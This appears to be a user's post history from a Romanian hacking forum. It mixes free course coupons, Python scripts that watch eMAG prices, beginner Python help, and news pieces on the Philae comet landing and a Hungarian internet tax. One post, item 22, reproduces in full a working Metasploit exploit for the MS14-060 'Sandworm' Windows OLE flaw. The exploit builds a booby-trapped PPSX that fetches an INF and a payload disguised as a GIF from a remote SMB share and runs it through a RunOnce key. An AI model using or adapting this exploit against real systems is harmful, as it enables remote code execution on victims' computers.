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  1. Usr6


    Learn Useable PHP in 14 Days: The Way PHP Should Be Taught Develop a foundation in PHP the easy way with our time-tested lectures and exercises. Build apps and edit open-source https://www.udemy.com/onlinephpclass/?couponCode=XMAS2014FREE500
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  3. Usr6


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  4. Varianta domestica, pentru cei care tin pc-ul in aprins 24/24. In loc sa trimita oferta prin email, o tipareste in fisierul "chilipiruri.txt" si beepaie #!/usr/bin/env python import urllib2 import random import re import time import winsound #panou de configurare chilipir = 25 # pretul(ron) sub care sunteti anuntat interval_timp_cautare = 600 # in secunde, default 10 min (600 s) beepuri = 5 # nr beepuri pauza_beep = 5 # pauza intre beepuri in secunde durata = 10 # durata beepului in secunde print r""" #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#\ #.........RSTforums.com........#-\ #.............Usr6.............#--\/ #.Cautatoru de chilipiruri 1.1.#--/\ #..............................#-/ #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#/ """ def beeeep(TEXT): print TEXT with open("chilipiruri.txt", "a") as handle: handle.write("\n" *3 +str(time.strftime("%c")) +"\n" + TEXT) print "Verifica fisierul chilipiruri.txt" for i in range(beepuri): Freq = 2500 # Set Frequency To 2500 Hertz winsound.Beep(Freq,durata * 1000) time.sleep(pauza_beep ) return oferte = [] while True : oferta = "" random_nr = str(random.randint(10**16,99999999999999999)) ua = "Opera/%s.%s (Windows NT %s.%s) Presto/%s.%s.%s Version/%s.%s" \ %(random_nr[0], random_nr[1:3], random_nr[4], random_nr[5], random_nr[6], random_nr[7:9], random_nr[10:13], random_nr[13:15], random_nr[15:17]) try: site = "http://www.emag.ro/resigilate/sort-priceasc" req = urllib2.Request(site, None, {'User-Agent' : ua}) continut = urllib2.urlopen(req, timeout=30).read() match = re.findall('\"money-int\"\>(\d*)\<\/span\>\<sup class=\"money-decimal\"\>\d*.+\n.+\t+.+\n\t.+\n.+\n.+\<a href=\"(.+#resigilate)"',continut) for every in match: pret, link = every if int(pret) <= chilipir: link = "http://www.emag.ro" + link unic = str(pret) + link if unic not in oferte: oferta += str(pret) + "\t" + link +"\n" oferte.append(unic) except Exception as E: print "\n!!! EROARE !!!\n" beeeep(str(E)) if len(oferta) >= 1: beeeep(oferta) time.sleep(interval_timp_cautare) print time.strftime("%c"), "nimic nou" exit()
  5. Usr6


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  7. "Cautatoru de chilipiruri" tine evidenta preturilor scazute de pe Produse Resigilate Pret asc - eMAG.ro si in cazul in care apare vreun produs sub pretul specificat de tine in setari (Default: 25 RON), iti va trimite un email pentru a te atentiona de aparitia acelui produs: Scriptul a fost testat folosind serverul smtp oferit de inbox.com (moka), default cauta din 10 in 10 minute #!/usr/bin/env python import smtplib import urllib2 import random import re import time #panou de configurare email = "" #unde vrei sa primesti ofertele smtp = "my.inbox.com" loginuser = "@inbox.com" loginpass = "" chilipir = 25 #pretul(ron) sub care sunteti anuntat interval_timp_cautare = 600 # in secunde print r""" #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#\ #.........RSTforums.com........#-\ #.............Usr6.............#--\/ #...Cautatoru de chilipiruri...#--/\ #..............................#-/ #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#/ """ def email_sender(TEXT): #print TEXT message = 'To:' + email + '\n' + 'From: ' + loginuser + '\n' + 'Subject:Chilipir \n\n' + TEXT server = smtplib.SMTP(smtp, 587) server.login(loginuser, loginpass ) server.sendmail(loginuser, email, message) server.quit() print "Oferta a fost expediata" return expediate = [] while True : expediat = "" random_nr = str(random.randint(10**16,99999999999999999)) ua = "Opera/%s.%s (Windows NT %s.%s) Presto/%s.%s.%s Version/%s.%s" \ %(random_nr[0], random_nr[1:3], random_nr[4], random_nr[5], random_nr[6], random_nr[7:9], random_nr[10:13], random_nr[13:15], random_nr[15:17]) try: site = "http://www.emag.ro/resigilate/sort-priceasc" req = urllib2.Request(site, None, {'User-Agent' : ua}) continut = urllib2.urlopen(req, timeout=30).read() match = re.findall('\"money-int\"\>(\d*)\<\/span\>\<sup class=\"money-decimal\"\>\d*.+\n.+\t+.+\n\t.+\n.+\n.+\<a href=\"(.+#resigilate)"',continut) for every in match: pret, link = every if int(pret) <= chilipir: link = "http://www.emag.ro" + link unic = str(pret) + link if unic not in expediate: expediat += str(pret) + "\t" + link +"\n" expediate.append(unic) except Exception as E: email_sender(str(E)) if len(expediat) >= 1: email_sender(expediat) time.sleep(interval_timp_cautare) print time.strftime("%c"), "nimic nou" exit()
  8. python-ul e un fel de c mai avansat sir_initial = "Ana are mere" sir_final = "" for i in range(len(sir_initial)): if sir_initial != " ": sir_final += sir_initial else: sir_final += "spatiu" print sir_final sau: import re sir_initial = "Ana are mere" print re.sub(" ", "spatiu", sir_initial)
  9. Usr6


    Learn Python Programming From Scratch The main concepts covered in this course are Basic Python programming Syntax Python Data Structures Object Oriented Programming in Python Web programming in Python Django framework for Python https://www.udemy.com/learn-python-programming-from-scratch/?couponCode=LearnPython
  10. Usr6


    Python 101 The course covers the following topics: Section1: installation Python and Eclipse IDE. Section2: Basics of Python Objects like Strings, Numbers, Booleans, Operators, Code indentation explained. Section3: Conditionals & Loops. Section4: String Objects. Section5: List Objects Section6: Tuples, Sets and Dictionaries. Section7: Functions, Iterators and Generators. Section8: Using Modules. Section9: Python Classes & Objects. Section10: File Handling. Section11: Exceptions. Section12: Database Programming with Python. https://www.udemy.com/kypython-101/?couponCode=FREEPYTHON101
  11. Philae Agentia spatiala europeana a reusit, miercuri, o premiera istorica in explorarea Universului: plasarea unui robot pe o cometa aflata in miscare, la sute de milioane de kilometri de Pamant. Robotul s-a desprins de dimineata de sonda spatiala Rosetta. Dupa 7 ore de cadere libera lenta, atras doar de slaba forta gravitationala exercitata de tinta, s-a pozitionat pe nucleul cometei. Robotul ar urma sa functioneze pana in martie 2015, fiind condamnat “sa moara de caldura” cand cometa se va apropia de Soare. Aceasta misiune de “arheologie spatiala” incearca sa cerceteze evolutia Sistemului Solar, cometele fiind considerate vestigii ale materiei primitive. Premiera in industria spatiala Aceasta misiune de “arheologie spatiala“, inceputa in 2004, odata cu lansarea sondei Rosetta, incearca sa descifreze evolutia Sistemului Solar dupa nasterea acestuia, intrucat cometele sunt considerate adevarate “vestigii” ale materiei spatiale primitive. Agentia Spatiala Europeana (ESA) nu a precupetit niciun efort pentru aceasta premiera in istoria explorarii spatiale, comparabila, potrivit unor oameni de stiinta, cu plasarile sondelor Viking pe Marte in 1976. Misiunea Rosetta a fost indelung si atent pregatita. Nu mai putin de trei centre operationale sunt mobilizate: Centrul european pentru operatiuni spatiale (ESOC) al ESA din Darmstadt (Germania), Centrul de control pentru coborari spatiale al DLR (Agentia spatiala germana) din Koln (Germania) si Centrul de operatiuni stiintifice si navigatie stelara CNES (Agentia spatiala franceza) din Toulouse (Franta). Totul se va realiza in aproximativ sapte ore, la o distanta de 511 milioane de kilometri de Terra. Philae, un robot-laborator cu greutatea de 100 de kilograme, se va desprinde de sonda Rosetta miercuri, la ora 08.35 GMT, la o distanta de 20 de kilometri de suprafata cometei. Philae a petrecut noaptea pe cometa. Povestea misiunii Rosetta care poate face istorie pentru Europa Robotul Philae a aterizat cu succes pe cometa Churyumov-Gerasimenko si trimite poze de acolo, chiar daca intial au fost probleme si harpoanele nu se atasasera cum trebuie. Totusi, o problema este faptul ca Phile se gaseste “pe o panta puternic inclinata”Misiunea inceputa in 1993 de Agentia Spatiala Europeana este una dificila si are o istorie interesanta. “Philae a petrecut noaptea pe cometa si avem trei vesti bune”, spuneau sefii misiunii. Realizarea e uimitoare: oamenii au reusit sa plaseze un robot de marimea unei masini de spalat pe o cometa care nu doar ca se gaseste la peste 500 milioane km de Pamant, dar se deplaseaza si cu peste 55.000 km/h UPDATE Philae nu a aterizat la locul prevazut, ci intr-unul mai accidentat si cu foarte putina lumina, ceea ce nu este bine pentru bateriile solare. Robotul “a sarit ca un ied” la aterizare, iar acum este inclinat, “dar cu antenele spre cer”. NASA a avut inca din anii 80? in plan sa creeze o sonda care sa se “intalneasca” in spatiu cu o cometa si sa o urmeze timp de trei ani, pentru a o studia. NASA a anulat misiunea in 1992 din lipsa de fonduri, iar Agentia Spatiala Europeana a decis in 1993 sa incerce un astfel de proiect si asa s-a nascut misiunea Rosetta, bugetele fiind ajustate in consecinta. Primele imagini ale cometei Se estimeaza ca misiunea va avea ajunge sa coste in total 1,3 miliarde euro, iar sonda europeana Rosetta, care navigheaza de zece ani in spatiu, a dat miercuri drumul micului robot-laborator Philae care dupa o cadere bine calculata de sapte ore a aterizat pe nucleul cometei Churyumov-Gerasimenko. Philae cantareste 100 kg, este de dimensiunea unei masini de spalat si are o multitudine de senzori si de aparate avansate de masuratori. Initial, miercuri dupa ora 16.00 GMT au fost probleme cu prinderea lui Philae pe corpul cometei cu harpoanele special create, care nu s-au activat. Au existat si probleme cu propulsoarele menite sa directioneze modulul catre cometa si de aceea, la prima incercare de contact, Philae a ricosat puternic insa joi dimineata s-a confirmat faptul ca robotul-laborat este prins corespunzator. “Philae a petrecut noaptea pe cometa si avem trei vesti bune”, spune Jean-Yves Le Gall, presedinte al Centrului National de Studii Spatiale. Cele trei vesti bune erau ca Philae este pe nucleul cometei, ca primeste energie catre panourile solare si ca exista contact permanent cu robotul-laborator. UPDATE 1 Totusi, o problema este faptul ca Phile se gaseste “pe o panta puternic inclinata, de 30%” “Philae functioneaza bine, bateriile merg si furnizeaza energie. Putem sa-i trimitem comenzi si ne raspunde trimitand date. Toate instrumentele carora le-am trimis comenzi noaptea trecuta functioneaza corect”, spune Philippe Gaudon, seful proiectului Rosetta la Centrul National de Studii Spatiale din Toulouse. Fotografiile arata insa ca Phiale se gaseste pe o panta abrupta “Pare inconjurat de faleze si, in consecinta, “pare destul de blocat”. Pentru ca au fost probleme la aterizare, Philae a ricosat de doua ori si se estimeaza ca este la circa un kilometru de locul la care trebuia sa aterizeze. UPDATE 2 Dupa al doilea salt, Philae a ajuns intr-un loc accidentat, langa un perete stancos “un loc in care nu ne-am fi dorit sa ajunga fiindca nu e multa lumina, ci doar o ora jumatate de lumina la fiecare 12 ore”, a spus Marc Pircher, director la CNES Toulouse. Acest lucru este o problema fiindca bateriile care dureaza 50-55 de ore au nevoie de Soare pentru a se incarca. “A sarit ca un ied, dar nimic nu s-a stricat. Philae e momentan un pic dezechilibrat, sta se pare in doua picioare, in loc de trei, si e complet inclinat. Norocul e ca antenele sunt spre cer, ceea ce inseamna ca merge bine comunicarea cu Rosetta” a mai spus Pircher. Ce va urma Daca totul merge bine, Philae va avea o speranta de viata intre 4 si 6 luni pe cometa, inainte de a cadea de pe obiectul cosmic ca urmare a topirii provocate de caldura de la Soare. Misiunea robotului Philae este de a explora nucleul cometei, structura sa interna, natura si compozitia sa. Oamenii de stiinta se asteapta la multe lucruri din partea explorarii moleculelor complexe, care ar putea raspunde unor intrebari despre originea vietii pe Pamant. Aceasta misiune de “arheologie spatiala” isi datoreaza numele pietrei Rosetta care i-a permis francezului Champollion sa descifreze hieroglifele egiptene, la inceputul secului al XIX-lea. “Cometele sunt ‘capsule-martor’ ale nasterii sistemului solar”, in urma cu 4,6 miliarde de ani”, explica Mark McCaughrean, unul dintre responsabilii cu explorarea spatiala de la ESA. “Deschiderea acestor capsule, analizand gazul, praful si in special gheata care le formeaza inseamna obtinerea unor indicii formidabile despre originea sistemului nostru solar si poate chiar a vietii”, adauga acesta. Cometa 67P are o masa estimata la 10.000 de tone, a luat nastere acum patru miliarde de ani, “goneste” cu 55-60.000 km/h si are oarecum forma unei ratuste de jucarie. A fost numita dupa cei doi astronomi care au descoperit-o in 1969: Klim Churyumov si Svetlana Gerasimenko, iar estimarile arata ca temperatura la suprafata ar fi -70 grade. Desprea aterizare La jumatatea lui septembrie ESA a stabilit punctul de pe cometa 67/P Churyumov-Gerasimenko pe care urma sa se “aseze” modulul Philae. Numit de oamenii de stiinta ‘punctul J’, locul este de fapt o suprafata de un kilometru patrat situata pe ‘capul’ cometei, la numai 4 kilometri de extremitatea exterioara a acesteia. Desi nu este perfecta, acesta a fost considerata de specialisti drept cea mai potrivita zona din cele cinci selectionate in prealabil in acest scop. Alegerea a tinut cont de criterii precum gradul de iluminare de la Soare, relieful terenului, temperatura cometei, presiunea si densitatea gazului care inconjoara nucleul acesteia si viteza de rotatie. Sonda Rosetta se afla pe orbita cometei 67/P Churyumov-Gerasimenko din 6 august. Robotul Philae s-a desprins de sonda Rosetta la ora 9.00 GMT miercuri si dupa sapte ore a ajuns la cometa. Sursa: Sonda spatiala Rosetta a plasat robotul Philae pe o cometa - Romania Military
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  13. Usr6


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  14. Usr6

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  16. Usr6


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  18. Usr6

    Help Python

    un mic upgrade i = raw_input("The number : ") try: i = int(i) # convertesti ce ai citit de la tastatura in int si il pui in acelasi i except: print "nu ai introdus un numar:(" # exit() daca introduci doar numere merge si direct cu input i = input("The number : ") print i +1
  19. Autoritatile de la Budapesta propun un impozit pe transferul de date pe internet, ... Impozitul propus, inclus in proiectul de buget pe 2015, ii va forta pe furnizorii de servicii de internet sa plateasca 150 de forinti (49 eurocenti) pentru fiecare gigabyte de date uploadat si downloadat de abonati. Artiocol complet: Ungaria planuieste un impozit care scandalizeaza companiile din domeniul internetului - IT - HotNews.ro
  20. Usr6


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  22. Full title MS14-060 Microsoft Windows OLE Package Manager Code Execution Exploit Date add 2014-10-18 Category remote exploits Platform windows CVE CVE-2014-4114 Description: This Metasploit module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "MS14-060 Microsoft Windows OLE Package Manager Code Execution", 'Description' => %q{ This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. However, based on our testing, the most reliable setup is on Windows platforms running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to a failure in the CPackage::CreateTempFileName function. This module will generate three files: an INF, a GIF, and a PPSX file. You are required to set up a SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an older version of Winodws (such as XP) work best for this because they require little configuration to get going. The PPSX file is what you should send to your target. In detail, the vulnerability has to do with how the Object Packager 2 component (packager.dll) handles an INF file that contains malicious registry changes, which may be leveraged for code execution. First of all, Packager does not load the INF file directly. But as an attacker, you can trick it to load your INF anyway by embedding the file path as a remote share in an OLE object. The packager will then treat it as a type of media file, and load it with the packager!CPackage::OLE2MPlayerReadFromStream function, which will download it with a CopyFileW call, save it in a temp folder, and pass that information for later. The exploit will do this loading process twice: first for a fake gif file that's actually the payload, and the second for the INF file. The packager will also look at each OLE object's XML Presentation Command, specifically the type and cmd property. In the exploit, "verb" media command type is used, and this triggers the packager!CPackage::DoVerb function. Also, "-3" is used as the fake gif file's cmd property, and "3" is used for the INF. When the cmd is "-3", DoVerb will bail. But when "3" is used (again, for the INF file), it will cause the packager to try to find appropriate handler for it, which will end up with C:\Windows\System32\infDefaultInstall.exe, and that will install/run the malicious INF file, and finally give us arbitrary code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery 'sinn3r', # Metasploit module 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2014-4114'], ['OSVDB', '113140'], ['MSB', 'MS14-060'], ['BID', '70419'], ['URL' , 'http://www.isightpartners.com/2014/10/cve-2014-4114/'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/'], ['URL', 'http://blog.vulnhunt.com/index.php/2014/10/14/cve-2014-4114_sandworm-apt-windows-ole-package-inf-arbitrary-code-execution/'] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Targets' => [ ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}], ], 'Privileged' => false, 'DisclosureDate' => "Oct 14 2014", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']), OptString.new('UNCPATH', [ true, 'The UNC folder to use (Ex: \\\\\\share)' ]) ], self.class) end def exploit @unc = validate_unc_path if @unc.nil? fail_with(Failure::BadConfig, "UNCPATH must be a remote shared folder") end print_status("Creating the EXE payload...") payload_name = "#{rand_text_alpha(4)}.gif" p = generate_payload_exe print_status("Creating the INF file...") inf_name = "#{rand_text_alpha(4)}.inf" inf = inf_file(payload_name) print_status("Creating '#{datastore['FILENAME']}' file ...") exe_stream = ole_exe(payload_name) inf_stream = ole_inf(inf_name) zip = zip_ppsx(exe_stream, inf_stream) file_create(zip) payload_path = my_file_create(p, payload_name) print_good("#{payload_name} stored at #{payload_path}, copy it to the remote share: #{@unc}") inf_path = my_file_create(inf, inf_name) print_good("#{inf_name} stored at #{inf_path}, copy it to the remote share: #{@unc}") end def validate_unc_path if datastore['UNCPATH'] =~ /^\\{2}[[:print:]]+\\[[:print:]]+\\*$/ unc = datastore['UNCPATH'] else unc = nil end unc end def my_file_create(data, name) ltype = "exploit.fileformat.#{self.shortname}" path = store_local(ltype, nil, data, name) path end def zip_ppsx(ole_exe, ole_inf) zip_data = {} data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template') Dir["#{data_dir}/**/**"].each do |file| unless File.directory?(file) zip_data[file.sub(data_dir,'')] = File.read(file) end end # add the otherwise skipped "hidden" file file = "#{data_dir}/_rels/.rels" zip_data[file.sub(data_dir,'')] = File.read(file) # put our own OLE streams zip_data['/ppt/embeddings/oleObject1.bin'] = ole_exe zip_data['/ppt/embeddings/oleObject2.bin'] = ole_inf # create the ppsx ppsx = Rex::Zip::Archive.new zip_data.each_pair do |k,v| ppsx.add_file(k,v) end ppsx.pack end def ole_inf(file_name) content = "EmbeddedStg2.txt\x00" content << "#{@unc}\\#{file_name}\x00" data = [content.length].pack('V') data << content ole = create_ole("\x01OLE10Native", data) ole end def ole_exe(file_name) content = "EmbeddedStg1.txt\x00" content << "#{@unc}\\#{file_name}\x00" data = [content.length].pack('V') data << content ole = create_ole("\x01OLE10Native", data) ole end def create_ole(stream_name, data) ole_tmp = Rex::Quickfile.new('ole') stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE) stm = stg.create_stream(stream_name) stm << data stm.close directory = stg.instance_variable_get(:@directory) directory.each_entry do |entry| if entry.instance_variable_get(:@_ab) == 'Root Entry' # 02260200-0000-0000-c000-000000000046 # Video clip clsid = Rex::OLE::CLSID.new("\x02\x26\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46") entry.instance_variable_set(:@_clsId, clsid) end end # write to disk stg.close ole_contents = File.read(ole_tmp.path) ole_tmp.close ole_tmp.unlink ole_contents end def inf_file(gif_name) inf = <<-EOF ; 61883.INF ; Copyright (c) Microsoft Corporation. All rights reserved. [Version] Signature = "$CHICAGO$" Class=61883 ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} Provider=%Msft% DriverVer=06/21/2006,6.1.7600.16385 [DestinationDirs] DefaultDestDir = 1 [DefaultInstall] RenFiles = RxRename AddReg = RxStart [RxRename] #{gif_name}.exe, #{gif_name} [RxStart]# HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\#{gif_name}.exe EOF inf end end # 00EAE150AD0BF41A 1337day.com [2014-10-19] 7D6E5B9B94F94D82 # Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
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